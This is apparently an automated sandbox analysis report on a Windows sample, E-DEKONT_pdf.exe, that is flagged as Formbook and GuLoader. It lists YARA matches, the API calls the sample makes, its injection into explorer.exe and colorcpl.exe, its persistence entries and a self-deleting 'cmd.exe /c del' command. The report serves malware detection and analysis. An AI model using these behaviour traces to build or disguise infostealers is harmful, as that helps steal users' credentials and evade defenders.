Source: 00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: E-DEKONT_pdf.exe PID: 1508, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

Code function: 0_2_00403390 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403390

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

File created: C:\Windows\Fonts\Dagvagts

Jump to behavior

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	Code function: 0_2_6EC92288	0_2_6EC92288
Source: C:\Windows\explorer.exe	Code function: 2_2_02E53232	2_2_02E53232
Source: C:\Windows\explorer.exe	Code function: 2_2_02E4DB30	2_2_02E4DB30
Source: C:\Windows\explorer.exe	Code function: 2_2_02E4DB32	2_2_02E4DB32
Source: C:\Windows\explorer.exe	Code function: 2_2_02E49082	2_2_02E49082
Source: C:\Windows\explorer.exe	Code function: 2_2_02E52036	2_2_02E52036
Source: C:\Windows\explorer.exe	Code function: 2_2_02E565CD	2_2_02E565CD
Source: C:\Windows\explorer.exe	Code function: 2_2_02E4AD02	2_2_02E4AD02
Source: C:\Windows\explorer.exe	Code function: 2_2_02E50912	2_2_02E50912
Source: C:\Windows\explorer.exe	Code function: 2_2_0B44B232	2_2_0B44B232
Source: C:\Windows\explorer.exe	Code function: 2_2_0B442D02	2_2_0B442D02
Source: C:\Windows\explorer.exe	Code function: 2_2_0B448912	2_2_0B448912
Source: C:\Windows\explorer.exe	Code function: 2_2_0B445B30	2_2_0B445B30
Source: C:\Windows\explorer.exe	Code function: 2_2_0B445B32	2_2_0B445B32
Source: C:\Windows\explorer.exe	Code function: 2_2_0B44E5CD	2_2_0B44E5CD
Source: C:\Windows\explorer.exe	Code function: 2_2_0B44A036	2_2_0B44A036
Source: C:\Windows\explorer.exe	Code function: 2_2_0B441082	2_2_0B441082
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350445	3_2_04350445
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043BD480	3_2_043BD480
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0441A526	3_2_0441A526
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_044075C6	3_2_044075C6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440F5C9	3_2_0440F5C9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043ED62C	3_2_043ED62C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436C600	3_2_0436C600
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04374670	3_2_04374670
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043FD646	3_2_043FD646
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440A6C0	3_2_0440A6C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350680	3_2_04350680
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440F6F6	3_2_0440F6F6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C36EC	3_2_043C36EC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434C6E0	3_2_0434C6E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04406757	3_2_04406757
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04352760	3_2_04352760
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435A760	3_2_0435A760
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043FE076	3_2_043FE076
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043400A0	3_2_043400A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_044070F1	3_2_044070F1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0438508C	3_2_0438508C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435B0D0	3_2_0435B0D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043ED130	3_2_043ED130
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0439717A	3_2_0439717A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0441010E	3_2_0441010E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436B1E0	3_2_0436B1E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043551C0	3_2_043551C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440124C	3_2_0440124C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433D2EC	3_2_0433D2EC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435E310	3_2_0435E310
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440F330	3_2_0440F330
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04341380	3_2_04341380
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435AC20	3_2_0435AC20
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CEC20	3_2_043CEC20
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440EC60	3_2_0440EC60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04340C12	3_2_04340C12
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04406C69	3_2_04406C69
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04353C60	3_2_04353C60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043FEC4C	3_2_043FEC4C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043E9C98	3_2_043E9C98
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0441ACEB	3_2_0441ACEB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D7CE8	3_2_043D7CE8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436FCE0	3_2_0436FCE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04368CDF	3_2_04368CDF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04407D4C	3_2_04407D4C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434AD00	3_2_0434AD00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350D69	3_2_04350D69
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440FD27	3_2_0440FD27
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04362DB0	3_2_04362DB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EFDF4	3_2_043EFDF4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04359DD0	3_2_04359DD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043F0E6D	3_2_043F0E6D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04370E50	3_2_04370E50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04392E48	3_2_04392E48
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04351EB2	3_2_04351EB2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04409ED2	3_2_04409ED2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04342EE8	3_2_04342EE8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04400EAD	3_2_04400EAD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440FF63	3_2_0440FF63
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435CF00	3_2_0435CF00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CFF40	3_2_043CFF40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04401FC6	3_2_04401FC6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04356FE0	3_2_04356FE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440EFBF	3_2_0440EFBF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043F0835	3_2_043F0835
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437E810	3_2_0437E810
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440F872	3_2_0440F872
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04353800	3_2_04353800
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04359870	3_2_04359870
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436B870	3_2_0436B870
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C5870	3_2_043C5870
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04336868	3_2_04336868
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C98B2	3_2_043C98B2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_044018DA	3_2_044018DA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_044078F3	3_2_044078F3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04366882	3_2_04366882
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043528C0	3_2_043528C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434E9A0	3_2_0434E9A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440E9A6	3_2_0440E9A6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043959C0	3_2_043959C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440EA5B	3_2_0440EA5B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440CA13	3_2_0440CA13
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436FAA0	3_2_0436FAA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440FA89	3_2_0440FA89
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0438DB19	3_2_0438DB19
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350B10	3_2_04350B10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440FB2E	3_2_0440FB2E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C4BC0	3_2_043C4BC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0015E658	3_2_0015E658
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_00142D90	3_2_00142D90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0015ED87	3_2_0015ED87
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_00149E50	3_2_00149E50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_00149E4C	3_2_00149E4C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_00142FB0	3_2_00142FB0

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0433B910 appears 268 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 043CEF10 appears 105 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04397BE4 appears 96 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04385050 appears 36 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 043BE692 appears 86 times

Source: C:\Windows\explorer.exe	Code function: 2_2_0B44CE12 NtProtectVirtualMemory,	2_2_0B44CE12
Source: C:\Windows\explorer.exe	Code function: 2_2_0B44B232 NtCreateFile,	2_2_0B44B232
Source: C:\Windows\explorer.exe	Code function: 2_2_0B44CE0A NtProtectVirtualMemory,	2_2_0B44CE0A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043834E0 NtCreateMutant,LdrInitializeThunk,	3_2_043834E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382C30 NtMapViewOfSection,LdrInitializeThunk,	3_2_04382C30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382CF0 NtDelayExecution,LdrInitializeThunk,	3_2_04382CF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382D10 NtQuerySystemInformation,LdrInitializeThunk,	3_2_04382D10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_04382DC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382E50 NtCreateSection,LdrInitializeThunk,	3_2_04382E50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382F00 NtCreateFile,LdrInitializeThunk,	3_2_04382F00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043829F0 NtReadFile,LdrInitializeThunk,	3_2_043829F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382A80 NtClose,LdrInitializeThunk,	3_2_04382A80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382B10 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_04382B10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382B00 NtQueryValueKey,LdrInitializeThunk,	3_2_04382B00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382B90 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_04382B90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382B80 NtCreateKey,LdrInitializeThunk,	3_2_04382B80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382BC0 NtQueryInformationToken,LdrInitializeThunk,	3_2_04382BC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04384570 NtSuspendThread,	3_2_04384570
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04384260 NtSetContextThread,	3_2_04384260
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04383C30 NtOpenProcessToken,	3_2_04383C30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382C20 NtSetInformationFile,	3_2_04382C20
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382C10 NtOpenProcess,	3_2_04382C10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382C50 NtUnmapViewOfSection,	3_2_04382C50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04383C90 NtOpenThread,	3_2_04383C90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382CD0 NtEnumerateKey,	3_2_04382CD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382D50 NtWriteVirtualMemory,	3_2_04382D50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382DA0 NtReadVirtualMemory,	3_2_04382DA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382E00 NtQueueApcThread,	3_2_04382E00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382EB0 NtProtectVirtualMemory,	3_2_04382EB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382E80 NtCreateProcessEx,	3_2_04382E80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382ED0 NtResumeThread,	3_2_04382ED0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382EC0 NtQuerySection,	3_2_04382EC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382F30 NtOpenDirectoryObject,	3_2_04382F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382FB0 NtSetValueKey,	3_2_04382FB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043838D0 NtGetContextThread,	3_2_043838D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043829D0 NtWaitForSingleObject,	3_2_043829D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382A10 NtWriteFile,	3_2_04382A10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382AA0 NtQueryInformationFile,	3_2_04382AA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382AC0 NtEnumerateValueKey,	3_2_04382AC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382B20 NtQueryInformationProcess,	3_2_04382B20
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382BE0 NtQueryVirtualMemory,	3_2_04382BE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0015A350 NtCreateFile,	3_2_0015A350
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0015A400 NtReadFile,	3_2_0015A400
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0015A480 NtClose,	3_2_0015A480
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0015A530 NtAllocateVirtualMemory,	3_2_0015A530
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0015A34A NtCreateFile,	3_2_0015A34A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0015A3FA NtReadFile,	3_2_0015A3FA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0015A52A NtAllocateVirtualMemory,	3_2_0015A52A

Source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMapiProxy.dll8 vs E-DEKONT_pdf.exe
Source: E-DEKONT_pdf.exe, 00000001.00000003.3166244281.00000000374AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs E-DEKONT_pdf.exe
Source: E-DEKONT_pdf.exe, 00000001.00000003.3254319112.00000000072F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs E-DEKONT_pdf.exe
Source: E-DEKONT_pdf.exe, 00000001.00000002.3255957507.00000000000D3000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs E-DEKONT_pdf.exe
Source: E-DEKONT_pdf.exe, 00000001.00000003.3253725384.00000000072E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs E-DEKONT_pdf.exe
Source: E-DEKONT_pdf.exe, 00000001.00000003.3161276121.00000000372F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs E-DEKONT_pdf.exe

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: E-DEKONT_pdf.exe	ReversingLabs: Detection: 21%
Source: E-DEKONT_pdf.exe	Virustotal: Detection: 23%

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

File read: C:\Users\user\Desktop\E-DEKONT_pdf.exe

Jump to behavior

Source: E-DEKONT_pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\E-DEKONT_pdf.exe C:\Users\user\Desktop\E-DEKONT_pdf.exe
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	Process created: C:\Users\user\Desktop\E-DEKONT_pdf.exe C:\Users\user\Desktop\E-DEKONT_pdf.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\E-DEKONT_pdf.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	Process created: C:\Users\user\Desktop\E-DEKONT_pdf.exe C:\Users\user\Desktop\E-DEKONT_pdf.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\E-DEKONT_pdf.exe"	Jump to behavior

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

0_2_00403390

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

File created: C:\Users\user\procharity

Jump to behavior

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nslA67B.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/19@25/16

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1484:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1484:304:WilStaging_02

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

File written: C:\Users\user\AppData\Roaming\DORME.ini

Jump to behavior

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Andetkamres

Jump to behavior

Source: E-DEKONT_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: colorcpl.pdbGCTL source: E-DEKONT_pdf.exe, 00000001.00000003.3254319112.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT_pdf.exe, 00000001.00000002.3255957507.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, E-DEKONT_pdf.exe, 00000001.00000003.3253725384.00000000072E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MapiProxy.pdb source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp
Source:	Binary string: colorcpl.pdb source: E-DEKONT_pdf.exe, 00000001.00000003.3254319112.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT_pdf.exe, 00000001.00000002.3255957507.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, E-DEKONT_pdf.exe, 00000001.00000003.3253725384.00000000072E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: E-DEKONT_pdf.exe, 00000001.00000001.2981717807.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: MapiProxy.pdb@ source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp
Source:	Binary string: wntdll.pdbUGP source: E-DEKONT_pdf.exe, 00000001.00000003.3166244281.0000000037382000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: E-DEKONT_pdf.exe, 00000001.00000003.3166244281.0000000037382000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe
Source:	Binary string: mshtml.pdbUGP source: E-DEKONT_pdf.exe, 00000001.00000001.2981717807.0000000000649000.00000020.00000001.01000000.00000006.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.3227448221.0000000004D35000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3225941650.00000000009EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\explorer.exe	Code function: 2_2_02E56B02 push esp; retn 0000h	2_2_02E56B03
Source: C:\Windows\explorer.exe	Code function: 2_2_02E56B1E push esp; retn 0000h	2_2_02E56B1F
Source: C:\Windows\explorer.exe	Code function: 2_2_02E569B5 push esp; retn 0000h	2_2_02E56AE7
Source: C:\Windows\explorer.exe	Code function: 2_2_0B44EB02 push esp; retn 0000h	2_2_0B44EB03
Source: C:\Windows\explorer.exe	Code function: 2_2_0B44EB1E push esp; retn 0000h	2_2_0B44EB1F
Source: C:\Windows\explorer.exe	Code function: 2_2_0B44E9B5 push esp; retn 0000h	2_2_0B44EAE7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043408CD push ecx; mov dword ptr [esp], ecx	3_2_043408D6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0015D4A5 push eax; ret	3_2_0015D4F8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0015D4F2 push eax; ret	3_2_0015D4F8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0015D4FB push eax; ret	3_2_0015D562
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0015D55C push eax; ret	3_2_0015D562
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0015E64C pushfd ; ret	3_2_0015E650
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_001566C1 push es; retf	3_2_001566EB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_00149B98 push 00000039h; ret	3_2_00149BA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0015DEBB push 1205285Dh; ret	3_2_0015DEC2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_00159FF3 push esp; iretd	3_2_00159FF4

Source: MapiProxy_InUse.dll.0.dr	Static PE information: section name: .00cfg
Source: MapiProxy_InUse.dll.0.dr	Static PE information: section name: .orpc

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

